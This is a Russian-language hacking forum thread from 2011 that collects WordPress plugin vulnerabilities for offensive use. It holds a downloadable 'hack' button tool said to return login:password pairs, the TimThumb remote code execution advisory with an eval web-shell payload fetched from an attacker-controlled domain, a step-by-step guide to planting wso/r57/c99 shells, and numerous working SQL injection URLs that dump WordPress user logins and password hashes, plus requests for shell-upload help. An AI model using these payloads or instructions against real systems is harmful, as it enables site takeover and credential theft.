[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Набросал мини-прогу:
    [​IMG]
    Мечта всех! Кнопка "Взломать" теперь работает :D
    [​IMG]
    Инструкция:
    Находим уязвимые сайт и вводим в прогу без http:// и без слешов(/)
    Типа binaries.ru и получаем логин:пасс в Result
    Скачать: _http://rghost.ru/14736221
     
    #161 Kuteke, 16 Jul 2011
    Last edited: 16 Jul 2011
  2. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    WordPress TimThumb Plugin - Remote Code Execution

    [​IMG]

    Code:
    # Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
    # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
    # Date: 3rd August 2011
    # Author: MaXe
    # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
    # Version: 1.32
    # Screenshot: See attachment
    # Tested on: Windows XP + Apache + PHP (XAMPP)
      
      
    WordPress TimThumb (Theme) Plugin - Remote Code Execution
      
      
    Versions Affected:
    1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
    (Version 1.33 did not save the cache file as .php)
     
      
    Info: (See references for original advisory)
    TimThumb is an image resizing utility, widely used in many WordPress themes.
     
      
    External Links:
    http://www.binarymoon.co.uk/projects/timthumb/
    http://code.google.com/p/timthumb/
      
    Credits:
    - Mark Maunder (Original Researcher)
    - MaXe (Indepedendent Proof of Concept Writer)
      
      
    -:: The Advisory ::-
    TimThumb is prone to a Remote Code Execution vulnerability, due to the
    script does not check remotely cached files properly. By crafting a
    special image file with a valid MIME-type, and appending a PHP file at
    the end of this, it is possible to fool TimThumb into believing that it
    is a legitimate image, thus caching it locally in the cache directory.
     
     
    Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
    http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
     
    Stored file on the Target: (This can change from host to host.)
    1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
    1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
    md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
     
     
    Proof of Concept File:
    \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
    \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
    \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
    \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
    \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
    \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
     
    (Transparent GIF + <?php @eval($_GET['cmd']) ?>
     
      
      
    -:: Solution ::-
    Update to the latest version 1.34 or delete the timthumb file.
     
    NOTE: This file is often renamed and you should therefore issue
    a command like this in a terminal: (Thanks to rAWjAW for this info.)
    find . | grep php | xargs grep -s timthumb
      
      
    Disclosure Information:
    - Vulnerability Disclosed (Mark Maunder): 1st August 2011
    - Vulnerability Researched (MaXe): 2nd August 2011
    - Disclosed at The Exploit Database: 3rd August 2011
     
      
      
    References:
    http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
    http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
    http://code.google.com/p/timthumb/issues/detail?id=212
    http://programming.arantius.com/the+smallest+possible+gif
    
    
     
    1 person likes this.
  3. Moriarty

    Moriarty Member

    Joined:
    9 Feb 2011
    Messages:
    16
    Likes Received:
    78
    Reputations:
    74
    PLUGIN :: [0day] AlixcaN Canlı Yayın Eklentisi ver.1.0 [SQL-inj]

    alixcan_life_f.php
    PHP:
    <?php
    /*
    Plugin Name: AlixcaN LiveFeed
    Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0
    Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem.
    Version: 1.0
    Author: AlixcaN | Alican Ertürk
    Author URI: http://www.alixcan.net
    */

    $pluginadi $_GET['plugin'];
    $parcala explode('_',$pluginadi);
    if(
    $_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){
        
    mysql_query("
    CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL,
      `resim` text COLLATE utf8_turkish_ci NOT NULL,
      `date` datetime NOT NULL,
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ;
    "
    );
    }

    function 
    alixcan_live_feed_ali() {
    if(isset(
    $_GET['feedlist']) == 'alix_feed_list'){
            
    $sayfa_basina 10;
        
    $sayfa_sor mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");
        
    $sayfalar ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);
        
        
    $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;
        
    $basla = ($sayfa 1) * $sayfa_basina;
        
        
    $sql mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");
        if(
    mysql_num_rows($sql)>0){echo '<h3>Gönderdiğiniz Feedler</h3>
        <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5">
        <tr>
            <td style="width:5%; font-weight:bold">ID</td>
            <td style="width:70%; font-weight:bold">Mesaj</td>
            <td style="width:25%; font-weight:bold">Tarih</td>
        </tr>
        '
    ;
            while (
    $row mysql_fetch_object($sql)){
                echo 
    '<tr>';
                        echo 
    '<td>'$row->id.'</td>';
                        echo 
    '<td>'.$row->baslik.'</td>';
                        echo 
    '<td>'.$row->date.'</td>';
                echo 
    '</tr>';
            }
        }    
        echo 
    '</table>';
    if(
    $sayfalar>=&& $sayfa <= $sayfalar){
    echo 
    '<div class="sayfalar">Sayfalar: ';
        
    $link 'index.php?feedlist=alix_feed_list&';
        for(
    $x=1$x<=$sayfalar$x++){
        
            echo 
    '<a href="'.$link.'alix_sayfa='.$x.'">';
            echo (
    $x == $sayfa) ? '<span>'.$x.'</span> ''<em>'.$x.'</em> ';
            echo 
    '</a>';
        }
    echo 
    '</div>';
    }
        
        
        
        echo 
    '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>';
    }elseif(isset(
    $_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){
        echo 
    '<p>
            Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br />
            Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br />
            Bu Yazıları
            <p style="margin-left:15px;">
                      [alixcan_live_feed] - Tüm Yazıları Listeler
                <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler
            </p>
            Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.
        </p>'
    ;
    } else{ 
    ?>


    <?php if($_POST['submittwit']){

    $baslik    $_POST['baslik'];
    $resim    $_POST['upload_image'];
    $date   $_POST['date'];
    global 
    $wpdb;

    $veri_dizisi = array(
            
    'baslik' => $baslik
            
    'resim'     => $resim,
            
    'date'   => $date
            
    );
    $wpdb->insert'wp_alixlivefeed'$veri_dizisi );
    echo 
    'Yazı Eklendi';

    /*submittwit bitimi */?>
    <script>
        jQuery(document).ready(function() {

        jQuery('#upload_image_button').click(function() {
         formfield = jQuery('#upload_image').attr('name');
         tb_show('', 'media-upload.php?type=image&amp;TB_iframe=true');
         return false;
        });

        window.send_to_editor = function(html) {
         imgurl = jQuery('img',html).attr('src');
         jQuery('#upload_image').val(imgurl);
         tb_remove();
        }
        });
    </script>


    <form action="" enctype="multipart/form-data" method="POST">
        
        <p>
            <label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br />
            <input type="text" name="baslik" id="baslik" style="width:100%" />
        </p>
        <p>
            <label for="upload_image">Resim:</label><br />
            <input id="upload_image" type="text" size="36" name="upload_image" value="" />
            <input id="upload_image_button" type="button" value="Resim Yükle" /><br />
            Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span>
        </p>
            <input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" />
        <p class="submit">
            <input type="submit" name="submittwit" id="submittwit" />
        </p>

    </form>
    <p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p>
    <?php
    // else
    }  // function

    function alixcan_live_feed_setup() {
        
    $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_live" class="edit-box open-box">Hakkında</a>';
        
    wp_add_dashboard_widget'alixcan_live_feed_ali'__'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' );
    }
    add_action('wp_dashboard_setup''alixcan_live_feed_setup');

    function 
    head_ekle(){
        echo 
    '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />';
    }
    add_action('wp_head''head_ekle');


    add_shortcode('alixcan_live_feed''alixcan_live_feed_shortcode');
    function 
    alixcan_live_feed_shortcode$atts$content null){
        global 
    $post;
        
    extractshortcode_atts( array( 'id' => '' ) , $atts ) );

        if(empty(
    $id)){
                
             
        
    $sayfa_basina 10;
        
    $sayfa_sor mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");
        
    $sayfalar ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);
        
        
    $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;
        
    $basla = ($sayfa 1) * $sayfa_basina;
        
        
    $sql mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");
        if(
    mysql_num_rows($sql)>0){echo '<div id="alixcan">
                <ul id="list">'
    ;
        while (
    $row mysql_fetch_object($sql)){
            echo 
    '<li>';
                        echo (!empty(
    $row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' '';
                        echo 
    $row->baslik.'<br /><em>'.$row->date.'</em>
                        <div style="clear:both;"></div>
                        </li>
                        '
    ;
        }echo 
    '</ul>';
        }else{
            echo 
    '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>';
        }
        
        
    if(
    $sayfalar>=&& $sayfa <= $sayfalar){
    echo 
    '<div class="sayfalar">Sayfalar: ';
        
    $link get_option('home'). '?p='get_the_ID();
        for(
    $x=1$x<=$sayfalar$x++){
        
            echo 
    '<a href="'.$link.'&alix_sayfa='.$x.'">';
            echo (
    $x == $sayfa) ? '<span>'.$x.'</span> ''<em>'.$x.'</em> ';
            echo 
    '</a>';
        }
    echo 
    '</div>';
    }
        echo 
    '</div>';
     
        }else{
            
             
    $sqlsor mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'");
                
    $row mysql_fetch_object($sqlsor);
                echo 
    '<div id="alixcan">
                <ul id="list">'
    ;
                echo 
    '<li>';
                echo (!empty(
    $row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' '';
                echo 
    $row->baslik.'<br /><em>'.$row->date.'</em>
                <div style="clear:both;"></div>
                </li>
                </ul>
                </div>'
    ;
            
        }
    //else
    }// func biter
    exploit:
    Code:
    http://wp/?alixcan_live_feed=news&id=1+UNION+SELECT+group_concat(user_login,0x3a,user_pass+SEPARATOR+0x3c62723e),2,3,4+FROM+wp_users--
     
    #163 Moriarty, 4 Aug 2011
    Last edited: 4 Aug 2011
    1 person likes this.
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    https://rdot.org/forum/showpost.php?p=2620&postcount=10
     
  5. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability

    Code:
    # Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
    # Date: 2011-08-05
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
    # Version: 4.7.7 (tested)
     
    ---
    PoC
    ---
    http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
     
    ---------------
    Vulnerable code
    ---------------
    function getPlaylist($id = '') {
        $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
        $playlistRow = mysql_fetch_row($query);
         
        return $this->withBackwardCompatibility($playlistRow[2]);
    }
     
    ...
     
    if (!empty($_GET["pp_playlist_id"])) {
        header("Content-type: application/xml");
        $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
    
    
    
     
    2 people like this.
  6. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Подскажите по заливке шелла в WordPress MU 2.9.1.1, там можно заливать в аттачментах к постам php, php4 файлы(добавил типы файлов в доверенные) - но они не выполняются а просто показывает код.
    Редактировать темы тоже почему-то не могу - нету такого раздела в Appearance.a
     
  7. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    Media Library Categories <= 1.0.6 SQL Injection Vulnerability

    Code:
    # Exploit Title: Media Library Categories <= 1.0.6 SQL Injection Vulnerability
    # Date: 2011-08-06
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/media-library-categories.1.0.6.zip
    # Version: 1.0.6 (tested)
     
    ---
    PoC
    ---
    http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
     
    http://www.site.com/wp-content/plugins/media-library-categories/sort.php?termid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))
     
    ---------------
    Vulnerable code
    ---------------
    $termid=$_GET['termid'];
     
    ...
     
    $where = '';
    if($termid)
    {
        $where .= " && tt.term_id=".$termid;
    }
     
    ...
     
    $query =     "SELECT p.*, a.term_order FROM " . $table_prefix . "posts p
                inner join " . $table_prefix . "term_relationships a on a.object_id = p.ID
                inner join " . $table_prefix . "term_taxonomy ttt on ttt.term_taxonomy_id = a.term_taxonomy_id
                inner join " . $table_prefix . "terms tt on ttt.term_id = tt.term_id
                where ttt.taxonomy='media_category' $where order by a.term_order asc;";
     
    $results = mysql_query($query); 
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Собственно пошаговая инструкция:
    1. Регистрируем домен: blogger.com.hacker.com
    2. Создаем скрипт shell.php с таким содержимым:
    PHP:
    <?php
    header
    ('Content-Type: image/jpeg');
    print 
    file_get_contents('shell.txt'); // ваш шелл wso, r57, c99, etc...
    ?>
    3. Идем сюда: http://target.com/wp-content/plugins/module/timthumb.php?src=http://blogger.com.hacker.com/shell.php
    4. Шелл тут: http://target.com/wp-content/plugins/module/cache/75ee2a70bd93faa5ae8ef9b823b8abae.php *
    * имя файла это md5('http://blogger.com.hacker.com/shell.php')
     
    _________________________
  9. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    WordPress IP-Logger Plugin <= 3.0 SQL Injection Vulnerability

    Code:
    # Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
    # Date: 2011-08-16
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
    # Version: 3.0 (tested)
     
    ---
    PoC
    ---
    http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
     
    ---------------
    Vulnerable code
    ---------------
    $sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name
      where Latitude=%s and Longitude=%s and Blocked = '%s'
      order by stamp asc limit 50",
      $_REQUEST["lat"],
      $_REQUEST["lon"],
      $_REQUEST["blocked"]);
     
    $res = mysql_query($sql);
     
    1 person likes this.
  10. DeleTeeeX

    DeleTeeeX New Member

    Joined:
    19 May 2011
    Messages:
    26
    Likes Received:
    2
    Reputations:
    -1
    Exploit Title: WordPress Collision Testimonials plugin

    Code:
    
    # Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
    # Date: 2011-08-26
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
    # Version: 3.0 (tested)
    # Note: user has to be logged in as "admin"
    ---
    PoC
    ---
    http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
     
    ---------------
    Vulnerable code
    ---------------
    if (isset($_GET['featQuote'])) {
    	$id = $_GET['id'];
    	mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
    };
    
    
     
  11. Moriarty

    Moriarty Member

    Joined:
    9 Feb 2011
    Messages:
    16
    Likes Received:
    78
    Reputations:
    74
    DJ On Air Widget SQL-inj
    PHP:
            .....
            
    $dj_ids $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta`
                                                    WHERE `meta_key` = 'shifts' 
                                                    AND `meta_value` LIKE '%"
    .$sDayTime."%';"   
                                                    
    );

    .....

            foreach(
    $dj_ids as $id) {
                
    $fetch $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";");
                
                
    $djs[] = $fetch;
            }
        .....    
    exploit:
    Code:
    http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_users+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+WHERE+meta_value=0x613A313A7B733A31333A2261646D696E6973747261746F72223B623A313B7D)--+
    Timthumb Vulnerability Scanner раскрытие путей
    этот ваще пена xD
    PHP:
     ....
       if(isset(
    $_REQUEST['cg-action'])){
          switch(
    $_REQUEST['cg-action']){
            case 
    'scan':
              include_once 
    'cg-tvs-filescanner.php';
              
    $scanner = new CG_FileScanner(WP_CONTENT_DIR);
              
    $scanner->generate_inventory();
              
    $scanner->scan_inventory();
              
    update_option('cg_tvs_last_checked'date("Y-m-d H:i:s"));
              
    update_option('cg_tvs_vulnerable_files'$scanner->VulnerableFiles);
              
    update_option('cg_tvs_safe_files'$scanner->SafeFiles);
            case 
    'fix':
              
    $nonce $_GET['_wpnonce'];
              if(
    wp_verify_nonce($nonce'fix_timthumb_file')){
                
    $fix_path urldecode($_GET['file']);
                
    $src_file_path trailingslashit(dirname(__FILE__)).'cg-tvs-timthumb-latest.txt';
                if(
    FALSE !== $fr = @fopen($src_file_path'r')){
                  
    $latest_src fread($frfilesize($src_file_path));
                  
    fclose($fr);
                }else{
                  
    $message "CAN'T READ TIMTHUMB SOURCE FILE";
                  break;
                }
                if(
    FALSE !== $fw = @fopen($fix_path'w')){
                  if(
    fwrite($fw$latest_src)){
                    
    $message "File <strong>".basename($fix_path)."</strong> at <em>".$fix_path."</em> successfully upgraded.";
                  }else{
                    
    $message "Unknown file write error.";
                  }
                }else{
                  
    $message "CAN'T OPEN VULNERABLE FILE FOR WRITING";
                  break;
                }
    ....
    exploit:
    Code:
    http://wp/wp-content/plugins/tvulnerscanner/cg-tvs-filescanner.php?file[]=
     
    2 people like this.
  12. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability

    Code:
    # Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
    # Google Dork: "?regevent_action=register&event_id"
    # Date: 2011-09-09
    # Author: serk
    # Vendor: http://edgetechweb.com/
    # Software Link: https://wordpress.org/extend/plugins/events-registration/
    # Version: 5.44
     
     
    [ exploit ]
     
    domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
     
  13. golnzales

    golnzales New Member

    Joined:
    25 Aug 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    WP Photo Album Plus 4.0.12

    #1 Blind SQLi @ wppa-functions.php:

    Code:
    function wppa_crumb_page_ancestors($sep, $page = '0') {
    global $wpdb;
    global $wppa;
    	
    	$query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
    	$parent = $wpdb->get_var($query);
    	if (!is_numeric($parent) || $parent == '0') return;
    	wppa_crumb_page_ancestors($sep, $parent);
    	$query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
    	$title = $wpdb->get_var($query);
    	if (!$title) {
    		$title = '****';		// Page exists but is not publish
    		$wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>';
    		$wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>';
    	} else {
    		$wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>';
    		$wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>';
    	}
    }
    
    переменная $page из _GET не фильтруется.

    exploit:
    Если уровень вложения страницы галеры > 1, то при кривом запросе родительский элемент пропадает из навигации хлебных крошек.

    #2 SQLi @ wppa-functions.php

    Code:
    $thumbs = $wpdb->get_results('SELECT * FROM '.WPPA_PHOTOS.' WHERE mean_rating > 0 AND album = '.$alb.' ORDER BY mean_rating DESC LIMIT '.$max, 'ARRAY_A');
    
    exploit:
    somehomst.com/?page_id=9&topten=1&album=1 UNION ALL SELECT 1,2,3,version(),5,6,7,8,9,10--
     
  14. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Кто-нибудь заливал шелл через плагин contact form 7?
     
  15. tch

    tch New Member

    Joined:
    11 Jun 2011
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Кто подскажет как сейчас обстоят дела сookies для WP?
     
  16. SpaceMan

    SpaceMan New Member

    Joined:
    5 Jun 2011
    Messages:
    13
    Likes Received:
    4
    Reputations:
    0
    подскажите сплоит под WordPress 2.8.6
     
  17. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    117
    Likes Received:
    45
    Reputations:
    5
    WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability


    оДИН из самых популярных плагинов для WP!
    Докуя сайтов) работает на каждом втором сайте и чаще)

     
    #177 RexTiam, 18 Sep 2011
    Last edited: 18 Sep 2011
  18. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    117
    Likes Received:
    45
    Reputations:
    5
    Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)

     
  19. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Ребят, подскажите, есть ли актуальный сканер плагинов вп, который позволял бы узнать, какие плагины установлены?
     
    _________________________
  20. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    83
    Likes Received:
    140
    Reputations:
    16
    fl00der http://forum.antichat.ru/thread291666.html